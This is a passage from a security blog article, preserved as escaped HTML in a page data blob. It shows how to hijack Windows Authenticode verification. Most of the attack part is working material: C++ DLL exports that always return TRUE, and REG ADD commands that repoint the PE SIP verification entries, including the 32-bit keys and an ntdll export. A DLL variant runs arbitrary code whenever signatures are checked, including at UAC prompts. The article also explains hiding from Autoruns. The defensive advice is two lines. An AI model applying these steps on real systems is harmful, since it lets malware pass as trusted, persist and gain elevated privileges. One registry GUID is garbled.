signtool.exe:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>signtool.exe verify \u002Fv si.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Display SignTool Error: WinVerifyTrust returned error: 0x80096010, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017502438_5_c9ed5c36bc-1.jpeg\">\u003C\u002Fp>\u003Cp>Verify via sigcheck.exe:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>sigcheck.exe -q si.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Display The digital signature of the object did not verify, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017508230_6_ee453a5ea6-1.jpeg\">\u003C\u002Fp>\u003Ch2>0x03 Modify configuration to pass signature verification\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>View help documentation for Get-AuthenticodeSignature:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-Help Get-AuthenticodeSignature -Full \u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>View help documentation for the related operation Set-AuthenticodeSignature:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-Help Set-AuthenticodeSignature -Full\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Discover the function of this command:\u003C\u002Fp>\u003Cp>The Set-AuthenticodeSignature cmdlet adds an Authenticode signature to\u003C\u002Fp>\u003Cp>any file that supports Subject Interface Package (SIP).\u003C\u002Fp>\u003Cp>For information on SIP, refer to:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fblogs.technet.microsoft.com\u002Feduardonavarro\u002F2008\u002F07\u002F11\u002Fsips-subject-interface-package-and-authenticode\u002F\u003C\u002Fp>\u003Cp>Obtain useful information:\u003C\u002Fp>\u003Cp>There are some included as part of the OS (at least on Vista). Locate\u003C\u002Fp>\u003Cp>in the %WINDIR%\\System32 directory. They usually have a naming ending\u003C\u002Fp>\u003Cp>with sip.dll, i.e. msisip.dll is the Microsoft Installer (.msi) SIP.\u003C\u002Fp>\u003Cp>Search for SIP in Windows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ls C:\\Windows\\System32\\*sip.dll -Recurse -ErrorAction SilentlyContinue\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Only one in Win7: C:\\Windows\\System32\\msisip.dll\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Matt Graeber's test system is Win10, where multiple dlls can be found\u003C\u002Fp>\u003Cp>Open the DLL using IDA and examine the function DllRegisterServer()\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017514729_7_87f29790e5-1.jpeg\">\u003C\u002Fp>\u003Cp>Found a distinctive name MsiSIPVerifyIndirectData, which literally appears to be a signature verification function\u003C\u002Fp>\u003Cp>Look up information and locate the function at the following address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Fwindows\u002Fdesktop\u002Fcc542591%28v=vs.85%29.aspx\u003C\u002Fp>\u003Cp>Discovered that this function returns TRUE for successful verification and FALSE for verification failure\u003C\u002Fp>\u003Cp>This function corresponds to a registry key value located at:\u003C\u002Fp>\u003Cp>HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017519705_8_084a27e5a2-1.jpeg\">\u003C\u002Fp>\u003Cp>Different GUIDs correspond to verification for different file formats, for example:\u003C\u002Fp>\u003Cul>\u003Cli>C689AAB8-8E78-11D0-8C47-00C04FC295EE - PE\u003C\u002Fli>\u003Cli>DE351A43-8E59-11D0-8C47-00C04FC295EE - catalog\t.cat files\u003C\u002Fli>\u003Cli>9BA61D3F-E73A-11D0-8CD2-00C04FC295EE - CTL \t\t.ctl files\u003C\u002Fli>\u003Cli>C689AABA-8E78-11D0-8C47-00C04FC295EE - cabinet \t.cab file\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>GUID description referenced from \"Subverting Trust in Windows\" Page 4\u003C\u002Fp>\u003Cp>Next, attempt to replace the dll and FuncName under HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}\u003C\u002Fp>\u003Cp>Implemented via C++, create a dll, add an export function, format referencing CryptSIPVerifyIndirectData, code as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>BOOL WINAPI CryptSIPVerifyIndirectData(SIP_SUBJECTINFO *pSubjectInfo, SIP_INDIRECT_DATA *pIndirectData)\u003Cbr>{\u003Cbr>\treturn TRUE;\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Compile to generate signtest.dll\u003C\u002Fp>\u003Cp>Modify the registry:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}\" \u002Fv \"Dll\" \u002Ft REG_SZ \u002Fd \"C:\\test\\signtest.dll\" \u002Ff\u003Cbr>\u003Cbr>REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{C689AAB8-8E78-11D0-8C04FC295EE}\" \u002Fv \"FuncName\" \u002Ft REG_SZ \u002Fd \"CryptSIPVerifyIndirectData\" \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Restart cmd, verify using PowerShell:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-AuthenticodeSignature .\\si.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Display Valid, verification successful\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017523563_9_47ed23ba7a-1.jpeg\">\u003C\u002Fp>\u003Cp>Verification via signtool.exe:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>signtool.exe verify \u002Fv si.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Verification passed\u003C\u002Fp>\u003Cp>Verification via sigcheck.exe:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>sigcheck.exe -q si.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Verification passed, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017526550_10_1056ada91f-1.jpeg\">\u003C\u002Fp>\u003Cp>Restart explorer.exe, check file properties, signature status shows signature is effective, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017527745_11_04d69c89d5-1.jpeg\">\u003C\u002Fp>\u003Cp>Furthermore,\u003Cstrong>Does the DLL have to be in a fixed format?\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Therefore, proceed with the following test:\u003C\u002Fp>\u003Cp>The exported function is named test1, complete code as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>BOOL APIENTRY DllMain( HANDLE hModule, \u003Cbr>                       DWORD  ul_reason_for_call, \u003Cbr>                       LPVOID lpReserved\u003Cbr>\t\t\t\t\t )\u003Cbr>{\u003Cbr>    return TRUE;\u003Cbr>}\u003Cbr>BOOL WINAPI test1() \u003Cbr>{\u003Cbr>\treturn TRUE;\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Modify the corresponding registry key value:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}\" \u002Fv \"Dll\" \u002Ft REG_SZ \u002Fd \"C:\\test\\signtest.dll\" \u002Ff\u003Cbr>\u003Cbr>REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}\" \u002Fv \"FuncName\" \u002Ft REG_SZ \u002Fd \"test1\" \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The test can still bypass verification\u003C\u002Fp>\u003Cp>This indicates that as long as the exported function of the DLL returns TRUE, verification can be bypassed\u003C\u002Fp>\u003Cp>Therefore, one can search for system default DLLs and find an exported function that returns true (of course, there are many export functions available for exploitation here)\u003C\u002Fp>\u003Cp>For example, \"C:\\Windows\\System32\\ntdll.dll\"\u003C\u002Fp>\u003Cp>Exported function: DbgUiContinue\u003C\u002Fp>\u003Cp>The code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}\" \u002Fv \"Dll\" \u002Ft REG_SZ \u002Fd \"C:\\Windows\\System32\\ntdll.dll\" \u002Ff\u003Cbr>\u003Cbr>REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}\" \u002Fv \"FuncName\" \u002Ft REG_SZ \u002Fd \"DbgUiContinue\" \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This way, there is no need to leave a self-written DLL on the system\u003C\u002Fp>\u003Cp>For 64-bit systems, there are 32-bit registry key values\u003C\u002Fp>\u003Cp>If using 32-bit programs, such as 32-bit signtool and sigcheck, to bypass verification, it is also necessary to modify the 32-bit registry key values. The corresponding code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>REG ADD \"HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}\" \u002Fv \"Dll\" \u002Ft REG_SZ \u002Fd \"C:\\Windows\\System32\\ntdll.dll\" \u002Ff\u003Cbr>\u003Cbr>REG ADD \"HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}\" \u002Fv \"FuncName\" \u002Ft REG_SZ \u002Fd \"DbgUiContinue\" \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x04 Signature Verification Hijacking\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Modify the registry and write a DLL to bypass the signature verification process. If we add our own code in the DLL's export functions, this achieves signature verification hijacking.\u003C\u002Fp>\u003Cp>Add execution code in the signature verification:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>BOOL APIENTRY DllMain( HANDLE hModule, \u003Cbr>                       DWORD  ul_reason_for_call, \u003Cbr>                       LPVOID lpReserved\u003Cbr>\t\t\t\t\t )\u003Cbr>{\u003Cbr>    return TRUE;\u003Cbr>}\u003Cbr>BOOL WINAPI test1() \u003Cbr>{\u003Cbr>\tWinExec(\"calc.exe\",SW_SHOWNORMAL);\u003Cbr>\treturn TRUE;\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Whenever an operation involves signature verification, loading our own DLL will launch the calculator.\u003C\u002Fp>\u003Cp>The following programs will perform signature verification operations:\u003C\u002Fp>\u003Cul>\u003Cli>DllHost.exe - When the “Digital Signatures” tab is displayed in file properties\u003C\u002Fli>\u003Cli>Process Explorer - When the “Verified Signer” tab is displayed\u003C\u002Fli>\u003Cli>Autoruns\u003C\u002Fli>\u003Cli>Sigcheck\u003C\u002Fli>\u003Cli>consent.exe - Any time a UAC prompt is displayed\u003C\u002Fli>\u003Cli>signtool.exe\u003C\u002Fli>\u003Cli>smartscreen.exe\u003C\u002Fli>\u003Cli>Get-AuthenticodeSignature\u003C\u002Fli>\u003Cli>Set-AuthenticodeSignature\u003C\u002Fli>\u003Cli>Security vendor software that performs certificate validation based on calls to WinVerifyTrust.\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This citation is from 'Subverting Trust in Windows' Page 33\u003C\u002Fp>\u003Cp>For example, viewing file properties - digital signature details, loading a DLL, and popping up a calculator, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017529048_12_dacd64b564-1.jpeg\">\u003C\u002Fp>\u003Cp>Specifically, executing a program with administrator privileges triggers UAC. If hijacked at this point, the permissions are system-level.\u003C\u002Fp>\u003Cp>The complete operation is shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017530466_13_3d4b591d2a-1.png\">\u003C\u002Fp>\u003Ch3>Supplement:\u003C\u002Fh3>\u003Cp>\u003Cstrong>1. DLL Hijacking\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Some GUIDs have default registry DLL paths as relative paths, which creates a DLL hijacking issue. This allows bypassing signature verification without modifying the registry.\u003C\u002Fp>\u003Cp>\u003Cstrong>2. Hiding from Autoruns\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The startup item detection tool Autoruns does not display files with Microsoft signatures by default, as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017532271_14_512caac932-1.jpeg\">\u003C\u002Fp>\u003Cp>If a file contains a Microsoft signature, it will not be displayed in the Autoruns panel by default.\u003C\u002Fp>\u003Ch2>0x05 Defense Recommendations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Some whitelisted programs trust files with Microsoft certificates by default, which poses a risk.\u003C\u002Fp>\u003Cp>It is recommended not to blindly trust certificates.\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the exploitation techniques related to Authenticode signatures—PE file signature forgery and signature verification hijacking. The next article will continue to discuss Authenticode signature forgery techniques—signature forgery targeting specific file types.\u003C\u002Fp>\u003Cp>Finally, thanks to Matt Graeber for sharing.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1142,"Onedaysec",6,"published","2026-02-02T07:51:00.263Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Authenticode Signature Forgery & Verification Hijacking in PE Files","Authenticode signature forgery, PE file signature, signature verification hijacking, Windows security, digital signature exploitation, SigThief, PowerShell, SIP, code execution backdoor",null,false,[],{"docs":43,"hasNextPage":40},[44,45,46,4],448,447,446,{"title":39,"description":39,"image":39},"2026-07-24T15:37:13.281Z","2026-07-23T16:01:35.840Z","draft","2026-07-23T16:06:22.016Z"]